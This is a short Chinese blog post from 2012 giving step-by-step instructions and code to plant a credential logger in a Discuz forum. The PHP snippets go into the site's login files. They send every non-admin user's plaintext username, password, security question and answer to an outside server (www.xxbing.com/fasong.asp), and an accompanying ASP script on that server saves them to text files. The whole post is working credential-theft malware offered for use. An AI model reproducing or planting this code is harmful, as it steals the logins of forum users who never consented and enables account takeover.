Discuz密码记录
作者:admin 发布于:2012-3-12 18:07 Monday 分类:网络转载
DZ记录密码,我自己做了份代码。
include/common.inc.php 里面插一个自定义函数。
我选择放在 41-53行。dz7.1-72 include/login.func.php (49-51行) | dz7.0 是在根目录的logging.php
function request_by_other($remote_server,$post_string){
$context = array(
'http'=>array(
'method'=>'POST',
'header'=>'Content-type: application/x-www-form-urlencoded'."\r\n".
'User-Agent : xxbing\'s fuckyou!!!'."\r\n".
'Content-length: '.strlen($post_string)+8,
'content'=>'mypost='.$post_string)
);
$stream_context = stream_context_create($context);
$data = file_get_contents($remote_server,FALSE,$stream_context);
return $data;
}找到根目录下的 logging.php文件。搜索下面代码。
$ucresult = uc_user_login($username, $password, $loginfield == 'uid');然后在后面插上下面的代码:
if($username!='admin'){
$showtime=gmdate("Ynj H:i:s",time()+8*3600);
if($answer==''){
$answer='无!';
}
//name1无用。但是必须加
$post_string = 'name1='.$name2.'&name='.$username.'&password='.$password.'&questionid='.$questionid.'&answer='.$answer.'&showtime='.$showtime.'&from='.$_SERVER['SERVER_NAME'];
request_by_other('http://www.xxbing.com/fasong.asp',$post_string);
}接收端:
<%
'接收文件
'body0 = request.form("name1")
body1 = request.form("name")
body2 = request.form("password")
body3 = request.form("questionid")
body4 = request.form("answer")
body5 = request.form("showtime")
body7 = request.form("from")
body6 = "账号:"&body1 &"---密码:"& body2 &"---问题ID:"& body3 &"---答案:"& body4 &"---时间:"& body5 &"---来源:" & body7
'response.write body6
FileName = date()&".txt"
'这里之所以要替换,是为了兼容IIS7的环境。
FileName = Replace(FileName,"/","-")
if body6 <>"" then
Call CreateFile(body6,FileName)
end if
Sub CreateFile(body,FileName)
Dim fso, tf ,cf
Set fso = CreateObject("Scripting.FileSystemObject")
Set tf = fso.openTextFile(server.mappath(FileName),8,True,0)
tf.WriteLine body
tf.WriteLine "----------------"
tf.Close
set fso = nothing
End Sub
%> 标签: Discuz